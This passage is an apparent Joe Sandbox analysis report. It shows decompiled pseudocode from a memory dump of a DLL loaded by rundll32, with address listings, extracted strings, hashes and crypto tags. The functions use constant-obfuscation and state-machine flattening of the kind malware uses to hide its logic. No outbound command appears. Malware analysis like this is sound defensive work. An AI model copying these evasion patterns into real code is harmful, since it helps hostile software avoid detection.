					_t135 = ( *(_t133 + 6) & 0x0000ffff) * 0x28 + _t161;
					while(_t161 < _t135) {
						_t131 =  <  ?  *((void*)(_t161 + 8)) :  *((intOrPtr*)(_t161 + 0x10));
						E1000E2FD( *((intOrPtr*)(_t161 + 0xc)) + _t156, _v24,  <  ?  *((void*)(_t161 + 8)) :  *((intOrPtr*)(_t161 + 0x10)), _v4,  *((intOrPtr*)(_t161 + 0x14)) +  *_t163);
						_t167 =  &(_t167[3]);
						_t161 = _t161 + 0x28;
					}
					goto L6;
				}
				return _t123;
			}

0x1001c932
0x1001c936
0x1001c938
0x1001c939
0x1001c93d
0x1001c941
0x1001c942
0x1001c943
0x1001c948
0x1001c952
0x1001c95a
0x1001c95e
0x1001c966
0x1001c975
0x1001c978
0x1001c984
0x1001c988
0x1001c990
0x1001c998
0x1001c99d
0x1001c9a5
0x1001c9ad
0x1001c9b5
0x1001c9bd
0x1001c9c5
0x1001c9ca
0x1001c9d2
0x1001c9d7
0x1001c9df
0x1001c9ec
0x1001c9ed
0x1001c9f6
0x1001c9fa
0x1001ca02
0x1001ca0a
0x1001ca12
0x1001ca1a
0x1001ca1f
0x1001ca27
0x1001ca34
0x1001ca38
0x1001ca40
0x1001ca48
0x1001ca52
0x1001ca56
0x1001ca5e
0x1001ca66
0x1001ca6b
0x1001ca70
0x1001ca78
0x1001ca86
0x1001ca88
0x1001ca8c
0x1001ca94
0x1001caa1
0x1001caa5
0x1001cab5
0x1001caba
0x1001cabc
0x1001cac1
0x1001caea
0x1001caec
0x1001caf1
0x1001cb4f
0x00000000
0x1001cb51
0x1001cb04
0x1001cb0d
0x1001cb17
0x1001cb1c
0x1001cb4a
0x1001cb36
0x1001cb3f
0x1001cb44
0x1001cb47
0x1001cb47
0x00000000
0x1001cb4e
0x1001cb57

Strings

x3, xrefs: 1001C966
Y, xrefs: 1001CA40
N9, xrefs: 1001CA8C
Q>, xrefs: 1001C988

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: N9$Q>$Y$x3
API String ID: 0-1902231974
Opcode ID: 8d3f0fed10d58b8ca1f72992de0987e26d3e9d9c3f3c0c5a1bb1977f5a5c67fa
Instruction ID: f2db71b4b644039a4e2f66c9b1c34f37ad5e42ab21590d946242d1e89469bf9e
Opcode Fuzzy Hash: 8d3f0fed10d58b8ca1f72992de0987e26d3e9d9c3f3c0c5a1bb1977f5a5c67fa
Instruction Fuzzy Hash: 835123715083409FD718CF29C88A81BBBF5FBC9758F448A1DF99A9A260C3B6D945CF06

Uniqueness

Uniqueness Score: -1.00%

Function 1001E689, Relevance: 3.9, Strings: 3, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001E689(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _t99;
				intOrPtr _t107;
				void* _t109;
				void* _t113;
				void* _t115;
				signed int _t127;
				void* _t129;
				signed int* _t133;

				_push(_a20);
				_t113 = __ecx;
				_push(1);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t99);
				_v12 = 0xcd7f;
				_t133 =  &(( &_v52)[7]);
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00006e75;
				_t129 = 0;
				_v52 = 0xbb67;
				_t115 = 0x1577f61f;
				_v52 = _v52 >> 2;
				_t127 = 0x63;
				_v52 = _v52 / _t127;
				_v52 = _v52 + 0xfbf;
				_v52 = _v52 ^ 0x000023c9;
				_v16 = 0x41ac;
				_v16 = _v16 + 0xffff68ac;
				_v16 = _v16 ^ 0xffffefde;
				_v20 = 0xbe13;
				_v20 = _v20 ^ 0xaf993be9;
				_v20 = _v20 ^ 0xaf9993ea;
				_v36 = 0x6eb4;
				_v36 = _v36 | 0xefff5fdf;
				_v36 = _v36 ^ 0xefff344d;
				_v24 = 0x8d36;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000950fd;
				_v28 = 0xebc0;
				_v28 = _v28 + 0xef7a;
				_v28 = _v28 ^ 0x0001d6ce;
				_v40 = 0x1b8a;
				_v40 = _v40 ^ 0xe96e8961;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0xeb7d4fab;
				_v32 = 0x15f0;
				_v32 = _v32 ^ 0x266c1b4c;
				_v32 = _v32 ^ 0x266c0537;
				_v44 = 0x40b3;
				_v44 = _v44 * 0x46;
				_v44 = _v44 + 0xffff660b;
				_v44 = _v44 << 0xb;
				_v44 = _v44 ^ 0x88b7d340;
				_v48 = 0x48d9;
				_v48 = _v48 >> 6;
				_v48 = _v48 << 0xc;
				_v48 = _v48 + 0xaf5d;
				_v48 = _v48 ^ 0x0012d24a;
				_v8 = 0x446;
				_v8 = _v8 + 0x5dee;
				_v8 = _v8 ^ 0x00007ea9;
				_t128 = _v4;
				do {
					while(_t115 != 0x3031bf3) {
						if(_t115 == 0x47b52bc) {
							_t109 = E10007F83(_v52, _v16,  &_v4, _t128, _v20);
							_t133 =  &(_t133[3]);
							if(_t109 != 0) {
								_t115 = 0x279576f3;
								continue;
							}
						} else {
							if(_t115 == 0x1577f61f) {
								_t115 = 0x3031bf3;
								continue;
							} else {
								if(_t115 == 0x207798c4) {
									E1000ADFC(_v44, _v48, _v4, _v8);
								} else {
									if(_t115 != 0x279576f3) {
										goto L13;
									} else {
										E1001801F(_v36, _v24, _v28, _v40, _v32, 1, _v4, _a4, _t115, 1, _t113);
										_t133 =  &(_t133[9]);
										_t115 = 0x207798c4;
										_t129 =  !=  ? 1 : _t129;
										continue;
									}
								}
							}
						}
						L16:
						return _t129;
					}
					_t107 = E100183DE(_t115);
					_t128 = _t107;
					if(_t107 == 0xffffffff) {
						_t115 = 0x5b8d76;
						goto L13;
					} else {
						_t115 = 0x47b52bc;
						continue;
					}
					goto L16;
					L13:
				} while (_t115 != 0x5b8d76);
				goto L16;
			}

0x1001e690
0x1001e696
0x1001e699
0x1001e69a
0x1001e69e
0x1001e69f
0x1001e6a3
0x1001e6a4
0x1001e6a5
0x1001e6aa
0x1001e6b2
0x1001e6b5
0x1001e6bc
0x1001e6c4
0x1001e6c6
0x1001e6ce
0x1001e6d3
0x1001e6de
0x1001e6e1
0x1001e6e5
0x1001e6ed
0x1001e6f5
0x1001e6fd
0x1001e705
0x1001e70d
0x1001e715
0x1001e71d
0x1001e725
0x1001e72d
0x1001e735
0x1001e73d
0x1001e74a
0x1001e74e
0x1001e756
0x1001e75e
0x1001e766
0x1001e76e
0x1001e776
0x1001e783
0x1001e787
0x1001e78f
0x1001e797
0x1001e79f
0x1001e7a7
0x1001e7b4
0x1001e7b8
0x1001e7c0
0x1001e7c5
0x1001e7cd
0x1001e7d5
0x1001e7da
0x1001e7df
0x1001e7e7
0x1001e7ef
0x1001e7f7
0x1001e7ff
0x1001e807
0x1001e80b
0x1001e80b
0x1001e81d
0x1001e88c
0x1001e891
0x1001e896
0x1001e898
0x00000000
0x1001e898
0x1001e81f
0x1001e825
0x1001e873
0x00000000
0x1001e827
0x1001e82d
0x1001e8df
0x1001e833
0x1001e839
0x00000000
0x1001e83f
0x1001e85f
0x1001e864
0x1001e867
0x1001e86e
0x00000000
0x1001e86e
0x1001e839
0x1001e82d
0x1001e825
0x1001e8e7
0x1001e8ef
0x1001e8ef
0x1001e8a6
0x1001e8ab
0x1001e8b0
0x1001e8bc
0x00000000
0x1001e8b2
0x1001e8b2
0x00000000
0x1001e8b2
0x00000000
0x1001e8c1
0x1001e8c1
0x00000000

Strings

], xrefs: 1001E7F7
un, xrefs: 1001E6BC
z, xrefs: 1001E75E

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: un$z$]
API String ID: 0-4241683264
Opcode ID: 885142b66529b9e9648675a164305462b694be2daed5d9c061d6829b76ede426
Instruction ID: 0a5cc31331d4ca89eae05bee3a64130719ba93a4415a0167603a81fb17202c1c
Opcode Fuzzy Hash: 885142b66529b9e9648675a164305462b694be2daed5d9c061d6829b76ede426
Instruction Fuzzy Hash: 09518671409381ABD358CF61C88941FBBE5FBC5398F104A1DF5965A2A0D7B5CA89CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10014D39, Relevance: 3.9, Strings: 3, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10014D39(void* __ecx, void* __edi, void* __eflags) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t169;
				signed int _t171;
				int _t175;
				void* _t178;
				signed int _t179;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t189;
				void* _t206;
				void* _t210;
				signed int _t212;

				_v4 = _v4 & 0x00000000;
				_v8 = 0x41d226;
				_v44 = 0xd2ba;
				_v44 = _v44 ^ 0xfefb1a6c;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x1fdf7912;
				_v24 = 0x9e12;
				_v24 = _v24 + 0x3502;
				_v24 = _v24 ^ 0x0000d304;
				_v52 = 0x8b71;
				_v52 = _v52 + 0x7865;
				_v52 = _v52 + 0x71bc;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0000001f;
				_v56 = 0x9c8c;
				_v56 = _v56 + 0xa869;
				_v56 = _v56 << 0xe;
				_t210 = __ecx;
				_t181 = 0x7e;
				_v56 = _v56 / _t181;
				_v56 = _v56 ^ 0x00a50eaa;
				_v68 = 0x3cf9;
				_t182 = 0x78;
				_v68 = _v68 / _t182;
				_t183 = 0x3b;
				_v68 = _v68 * 0x1e;
				_v68 = _v68 + 0x6555;
				_v68 = _v68 ^ 0x00007f5e;
				_v28 = 0x421d;
				_v28 = _v28 + 0xffff4181;
				_v28 = _v28 ^ 0xffffb8d3;
				_v64 = 0xa3da;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 >> 9;
				_v64 = _v64 / _t183;
				_v64 = _v64 ^ 0x0000285e;
				_v48 = 0x1647;
				_v48 = _v48 + 0xffff319b;
				_t184 = 0x14;
				_v48 = _v48 * 0x79;
				_v48 = _v48 ^ 0xffa8bdbe;
				_v20 = 0xf37d;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x000015ad;
				_v60 = 0x1b88;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 + 0xffff6835;
				_v60 = _v60 / _t184;
				_v60 = _v60 ^ 0x0cccccc2;
				_v16 = 0xc0ff;
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x0c0f9a57;
				_v32 = 0xd07d;
				_v32 = _v32 << 4;
				_v32 = _v32 + 0xffff081b;
				_v32 = _v32 ^ 0x000c18d9;
				_v36 = 0x1516;
				_v36 = _v36 | 0x7f48aae3;
				_v36 = _v36 + 0x2b28;
				_v36 = _v36 ^ 0x7f48a927;
				_v40 = 0xa482;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 ^ 0x073633cb;
				_v40 = _v40 ^ 0x073633cb;
				_v12 = E10013B73();
				_t178 = _v44 + E10013B73() % _v24;
				_t169 = E10013B73();
				_t171 = _v40;
				_t212 = _v52 + _t169 % _v56;
				if(_t171 < _t178) {
					_t179 = _t178 - _t171;
					_t206 = _t210;
					_t189 = _t179 >> 1;
					_t175 = memset(_t206, 0x2d002d, _t189 << 2);
					asm("adc ecx, ecx");
					_t210 = _t210 + _t179 * 2;
					memset(_t206 + _t189, _t175, 0);
				}
				E1000350A(_v16,  &_v12, 3, _t210, _t212, _v32, _v36);
				 *((short*)(_t210 + _t212 * 2)) = 0;
				return 0;
			}

0x10014d3c
0x10014d43
0x10014d4b
0x10014d53
0x10014d5b
0x10014d60
0x10014d68
0x10014d70
0x10014d78
0x10014d80
0x10014d88
0x10014d90
0x10014d98
0x10014d9d
0x10014da2
0x10014daa
0x10014db2
0x10014dc0
0x10014dc2
0x10014dc7
0x10014dcd
0x10014dd5
0x10014de1
0x10014de6
0x10014df1
0x10014df4
0x10014df8
0x10014e00
0x10014e08
0x10014e10
0x10014e18
0x10014e20
0x10014e28
0x10014e2d
0x10014e3a
0x10014e3e
0x10014e46
0x10014e4e
0x10014e5b
0x10014e5c
0x10014e60
0x10014e68
0x10014e70
0x10014e75
0x10014e7d
0x10014e85
0x10014e8a
0x10014e98
0x10014e9c
0x10014ea4
0x10014eac
0x10014eb1
0x10014eb9
0x10014ec1
0x10014ec6
0x10014ece
0x10014ed6
0x10014ede
0x10014ee6
0x10014eee
0x10014ef6
0x10014f03
0x10014f08
0x10014f0c
0x10014f1d
0x10014f3e
0x10014f44
0x10014f55
0x10014f59
0x10014f5d
0x10014f5f
0x10014f69
0x10014f6b
0x10014f6d
0x10014f6f
0x10014f71
0x10014f74
0x10014f77
0x10014f8c
0x10014f96
0x10014fa0

Strings

(+, xrefs: 10014EE6
^(, xrefs: 10014E3E
Ue, xrefs: 10014DF8

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (+$Ue$^(
API String ID: 0-3438607706
Opcode ID: 340144c76a2c3c1ae3fb0f50570e5bff50d6312e98429875ede8289528a64e2d
Instruction ID: 0b2be466233deeec8faeb8cb571813e75e04044f44ee41be8d3eef67b3f6c349
Opcode Fuzzy Hash: 340144c76a2c3c1ae3fb0f50570e5bff50d6312e98429875ede8289528a64e2d
Instruction Fuzzy Hash: 865102B1A083419FD348CF25D44950BBBE1FBD4758F408E1DF19A962A0D7B5DA09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1001D87D, Relevance: 3.8, Strings: 3, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001D87D(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _t131;
				void* _t140;
				signed int _t141;
				void* _t145;

				_t145 = __eflags;
				_v8 = 0xb476;
				_v8 = _v8 ^ 0xc86a25ed;
				_v8 = _v8 >> 3;
				_t140 = __ecx;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x5a095028;
				_v20 = 0x685b;
				_t131 = 0x48;
				_v20 = _v20 / _t131;
				_v20 = _v20 | 0x856a1e96;
				_v20 = _v20 ^ 0x856a13a9;
				_v44 = 0x13bd;
				_v44 = _v44 / _t131;
				_v44 = _v44 ^ 0x000011b1;
				_v32 = 0xea8b;
				_v32 = _v32 ^ 0xec2b0f55;
				_v32 = _v32 + 0xffffb52a;
				_v32 = _v32 ^ 0xec2bea5e;
				_v28 = 0x816b;
				_v28 = _v28 * 0x37;
				_v28 = _v28 + 0xffff8c22;
				_v28 = _v28 ^ 0x001b6d6b;
				_v24 = 0x18c7;
				_v24 = _v24 + 0xffff18e9;
				_v24 = _v24 + 0x206d;
				_v24 = _v24 ^ 0xffff3b7c;
				_v16 = 0x671c;
				_v16 = _v16 >> 7;
				_v16 = _v16 + 0xffffcfa7;
				_v16 = _v16 + 0xffff772a;
				_v16 = _v16 ^ 0xffff68a0;
				_v40 = 0xd012;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0xb48f;
				_v40 = _v40 ^ 0x0002013a;
				_v12 = 0x18f0;
				_v12 = _v12 + 0x4e37;
				_v12 = _v12 << 2;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x00060290;
				_v36 = 0x3ca;
				_v36 = _v36 + 0xee6f;
				_v36 = _v36 ^ 0x23ab00ea;
				_v36 = _v36 ^ 0x23abdc4f;
				_v48 = E10013B73();
				_v20 = 0xa300;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x626c6023;
				_v20 = _v20 ^ 0x62591c27;
				_v8 = 0x11ad;
				_v8 = _v8 << 9;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00000056;
				_t141 = E100180F6(_v8, _v20, _t145);
				E1001C7CD( &_v48, _t140, _v16, _v40, _v12, 3, _t141, _v36);
				 *((short*)(_t140 + _t141 * 2)) = 0;
				return 0;
			}

0x1001d87d
0x1001d883
0x1001d88c
0x1001d893
0x1001d89d
0x1001d8a1
0x1001d8a4
0x1001d8ab
0x1001d8b5
0x1001d8ba
0x1001d8bd
0x1001d8c4
0x1001d8cb
0x1001d8d7
0x1001d8da
0x1001d8e1
0x1001d8e8
0x1001d8ef
0x1001d8f6
0x1001d8fd
0x1001d908
0x1001d90b
0x1001d912
0x1001d919
0x1001d920
0x1001d927
0x1001d92e
0x1001d935
0x1001d93c
0x1001d940
0x1001d947
0x1001d94e
0x1001d955
0x1001d95c
0x1001d95f
0x1001d966
0x1001d96d
0x1001d974
0x1001d97b
0x1001d97f
0x1001d983
0x1001d98a
0x1001d991
0x1001d998
0x1001d99f
0x1001d9b1
0x1001d9b7
0x1001d9c2
0x1001d9c5
0x1001d9cc
0x1001d9d3
0x1001d9da
0x1001d9de
0x1001d9e2
0x1001da00
0x1001da13
0x1001da1d
0x1001da26

Strings

^+, xrefs: 1001D8F6
#`lb, xrefs: 1001D9C5
(PZ, xrefs: 1001D8A4

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #`lb$(PZ$^+
API String ID: 0-1774321979
Opcode ID: 05284d1d4aea52bb7ade3189c8723a9012c1f65da6b36867904c5e0e46cbb29e
Instruction ID: 9313d350ae27e22068d2cb1c3fc5f7c33da1060cf7db83f56e2aa61b671f5353
Opcode Fuzzy Hash: 05284d1d4aea52bb7ade3189c8723a9012c1f65da6b36867904c5e0e46cbb29e
Instruction Fuzzy Hash: 8651DC71D0121AEBDB48CFE5C98A4EEBBB1FF04314F208599D421B62A0D7B95B05CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10010950, Relevance: 2.7, Strings: 2, Instructions: 200
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10010950(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __ecx;
				void* _t182;
				signed int _t196;
				intOrPtr* _t205;
				void* _t207;
				void* _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				void* _t234;
				signed int* _t236;

				_t205 = _a12;
				_push(_a20);
				_t234 = __edx;
				_push(_a16);
				_push(_t205);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10017B8C(_t182);
				_v12 = 0x53dbb6;
				_t236 =  &(( &_v84)[7]);
				_t226 = 0;
				_v8 = _v8 & 0;
				_t207 = 0x11efafcc;
				_v4 = _v4 & 0;
				_v56 = 0x480d;
				_v56 = _v56 << 0xf;
				_t227 = 0x7b;
				_v56 = _v56 / _t227;
				_v56 = _v56 ^ 0x004aad92;
				_v28 = 0x5eb5;
				_v28 = _v28 ^ 0xebefda2c;
				_v28 = _v28 ^ 0xebefffa6;
				_v80 = 0x138;
				_v80 = _v80 ^ 0x8a64c341;
				_t228 = 0x79;
				_v80 = _v80 / _t228;
				_v80 = _v80 ^ 0xa99ced34;
				_v80 = _v80 ^ 0xa8b81497;
				_v32 = 0xf95d;
				_t229 = 0x78;
				_v32 = _v32 / _t229;
				_v32 = _v32 ^ 0x00003787;
				_v84 = 0x78d0;
				_v84 = _v84 ^ 0xb071a17e;
				_v84 = _v84 | 0xd469f929;
				_t230 = 0x74;
				_v84 = _v84 / _t230;
				_v84 = _v84 ^ 0x021bdabb;
				_v60 = 0x2611;
				_t231 = 0x24;
				_v60 = _v60 * 0x3b;
				_v60 = _v60 + 0xffff2d73;
				_v60 = _v60 ^ 0x0007e9d1;
				_v36 = 0x29aa;
				_v36 = _v36 | 0x0062d255;
				_v36 = _v36 ^ 0x0062a980;
				_v64 = 0x41a5;
				_v64 = _v64 + 0xffff977b;
				_v64 = _v64 | 0x1e3b5314;
				_v64 = _v64 ^ 0xffffc71d;
				_v76 = 0x5c7f;
				_v76 = _v76 / _t231;
				_v76 = _v76 >> 9;
				_v76 = _v76 * 0x43;
				_v76 = _v76 ^ 0x00006f6f;
				_v52 = 0x15ae;
				_v52 = _v52 + 0xffffe867;
				_v52 = _v52 << 6;
				_v52 = _v52 ^ 0xffff9c4a;
				_v40 = 0x33b5;
				_t196 = _v40;
				_t232 = 0x45;
				_t224 = _t196 % _t232;
				_v40 = _t196 / _t232;
				_v40 = _v40 | 0xcdb53045;
				_v40 = _v40 ^ 0xcdb5145d;
				_v44 = 0xf80e;
				_v44 = _v44 + 0xffff8b41;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x00020700;
				_v68 = 0x39f;
				_v68 = _v68 + 0xf5c;
				_v68 = _v68 | 0x52b8dcf2;
				_v68 = _v68 + 0xffff39c0;
				_v68 = _v68 ^ 0x52b833b9;
				_v16 = 0x88a4;
				_v16 = _v16 * 0x56;
				_v16 = _v16 ^ 0x002db55b;
				_v48 = 0xda9f;
				_v48 = _v48 | 0xfd2b9f4b;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 ^ 0x0007feef;
				_t233 = _v16;
				_v20 = 0xf2be;
				_v20 = _v20 | 0x6c1e7539;
				_v20 = _v20 ^ 0x6c1ee351;
				_v72 = 0xcc52;
				_v72 = _v72 >> 4;
				_v72 = _v72 + 0xffff0d6a;
				_v72 = _v72 << 7;
				_v72 = _v72 ^ 0xff8d3b43;
				_v24 = 0x8867;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x00003d9b;
				do {
					while(_t207 != 0x11efafcc) {
						if(_t207 == 0x17b35050) {
							_push(_t207);
							_t226 = E1000A0AD(_t233, _t224);
							if(_t226 == 0) {
								L7:
								return _t226;
							}
							_t207 = 0x2182500a;
							continue;
						}
						if(_t207 == 0x19df0965) {
							_t224 = _v28;
							_t233 = E1000721C(_v56, _v28, _v80, _a16, _t207, _v32, 0, 0, _a8, _v84, _v60, _v36, _t234, _t207, _t207, _v64);
							_t236 =  &(_t236[0xe]);
							if(_t233 == 0) {
								goto L7;
							}
							_t207 = 0x17b35050;
							continue;
						}
						if(_t207 != 0x2182500a) {
							goto L13;
						}
						E1000721C(_v40, _v44, _v68, _a16, _t207, _v16, _t226, _t233, _a8, _v48, _v20, _v72, _t234, _t207, _t207, _v24);
						if(_t205 != 0) {
							 *_t205 = _t233;
						}
						goto L7;
					}
					_t207 = 0x19df0965;
					L13:
				} while (_t207 != 0x112ca634);
				goto L7;
			}

0x10010954
0x1001095b
0x1001095f
0x10010961
0x10010965
0x10010966
0x1001096a
0x1001096e
0x10010970
0x10010975
0x1001097d
0x10010980
0x10010984
0x10010988
0x1001098d
0x10010991
0x10010999
0x100109a4
0x100109a9
0x100109af
0x100109b7
0x100109bf
0x100109c7
0x100109cf
0x100109d7
0x100109e3
0x100109e8
0x100109ee
0x100109f6
0x100109fe
0x10010a0a
0x10010a0f
0x10010a15
0x10010a1d
0x10010a25
0x10010a2d
0x10010a39
0x10010a3e
0x10010a44
0x10010a4c
0x10010a59
0x10010a5a
0x10010a5e
0x10010a66
0x10010a6e
0x10010a76
0x10010a7e
0x10010a86
0x10010a8e
0x10010a96
0x10010a9e
0x10010aa6
0x10010ab4
0x10010ab8
0x10010ac2
0x10010ac8
0x10010ad0
0x10010ad8
0x10010ae0
0x10010ae5
0x10010aed
0x10010af5
0x10010afb
0x10010afc
0x10010afe
0x10010b02
0x10010b0a
0x10010b12
0x10010b1a
0x10010b22
0x10010b27
0x10010b2f
0x10010b37
0x10010b3f
0x10010b47
0x10010b4f
0x10010b57
0x10010b64
0x10010b68
0x10010b70
0x10010b78
0x10010b80
0x10010b85
0x10010b8d
0x10010b91
0x10010b99
0x10010ba1
0x10010ba9
0x10010bb1
0x10010bb6
0x10010bbe
0x10010bc3
0x10010bcb
0x10010bd3
0x10010bd8
0x10010be0
0x10010be0
0x10010bf2
0x10010cb1
0x10010cb9
0x10010cbe
0x10010c4e
0x10010c57
0x10010c57
0x10010cc0
0x00000000
0x10010cc0
0x10010bfe
0x10010c86
0x10010c96
0x10010c98
0x10010c9d
0x00000000
0x00000000
0x10010c9f
0x00000000
0x10010c9f
0x10010c06
0x00000000
0x00000000
0x10010c40
0x10010c4a
0x10010c4c
0x10010c4c
0x00000000
0x10010c4a
0x10010cca
0x10010ccf
0x10010ccf
0x00000000

Strings

H, xrefs: 10010991
oo, xrefs: 10010AC8

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H$oo
API String ID: 0-1614718691
Opcode ID: 35570222b46468966bd551cd3b27edd3af8765477437d4debfe0f9f0754122bf
Instruction ID: a1456208c45a5c12a26ef59259f153582e59453aa99d6617e95eaffef9875826
Opcode Fuzzy Hash: 35570222b46468966bd551cd3b27edd3af8765477437d4debfe0f9f0754122bf
Instruction Fuzzy Hash: 5C9114725083419FE368CF65C88994FBBE1FBD4754F408A0DF6D58A260C3B599498F83

Uniqueness

Uniqueness Score: -1.00%

Function 1000E8F6, Relevance: 2.6, Strings: 2, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000E8F6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t115;
				void* _t127;
				void* _t129;
				void* _t133;
				void* _t135;
				intOrPtr _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int* _t160;

				_push(_a8);
				_t153 = _a4;
				_t133 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t115);
				_v84 = 0x3e510b;
				_t154 = 0;
				_v80 = 0;
				_t160 =  &(( &_v132)[4]);
				_v112 = 0x9372;
				_v112 = _v112 >> 6;
				_t135 = 0x1d02af91;
				_v112 = _v112 | 0xd4635c55;
				_v112 = _v112 ^ 0xd46318c8;
				_v116 = 0xaecb;
				_v116 = _v116 | 0xf516c3e3;
				_v116 = _v116 ^ 0x89237bf8;
				_v116 = _v116 ^ 0x7c35a493;
				_v132 = 0x7f3f;
				_v132 = _v132 ^ 0xad0fe52f;
				_v132 = _v132 + 0x9d2d;
				_v132 = _v132 ^ 0x31545012;
				_v132 = _v132 ^ 0x9c445bcf;
				_v100 = 0x8d44;
				_v100 = _v100 + 0xffff01bc;
				_v100 = _v100 ^ 0xfffff790;
				_v104 = 0xb84;
				_t155 = 0x7b;
				_v104 = _v104 / _t155;
				_v104 = _v104 ^ 0x000000d2;
				_v120 = 0x9591;
				_v120 = _v120 + 0xffff80ac;
				_t156 = 0xc;
				_v120 = _v120 / _t156;
				_v120 = _v120 ^ 0x00003ea2;
				_v96 = 0xa086;
				_v96 = _v96 + 0x1e12;
				_v96 = _v96 ^ 0x0000f9ec;
				_v108 = 0x32f5;
				_t157 = 0x63;
				_v108 = _v108 * 0x30;
				_v108 = _v108 / _t157;
				_v108 = _v108 ^ 0x00006600;
				_v128 = 0xde8b;
				_v128 = _v128 + 0x3738;
				_v128 = _v128 + 0xfa1d;
				_v128 = _v128 * 0x38;
				_v128 = _v128 ^ 0x00730821;
				_v88 = 0xc595;
				_v88 = _v88 + 0x3b65;
				_v88 = _v88 ^ 0x00017107;
				_v92 = 0x107d;
				_v92 = _v92 + 0xffff722d;
				_v92 = _v92 ^ 0xffffb735;
				_v124 = 0xecf9;
				_v124 = _v124 * 0x30;
				_v124 = _v124 ^ 0x7a61c785;
				_v124 = _v124 * 0x70;
				_v124 = _v124 ^ 0x81fa6355;
				do {
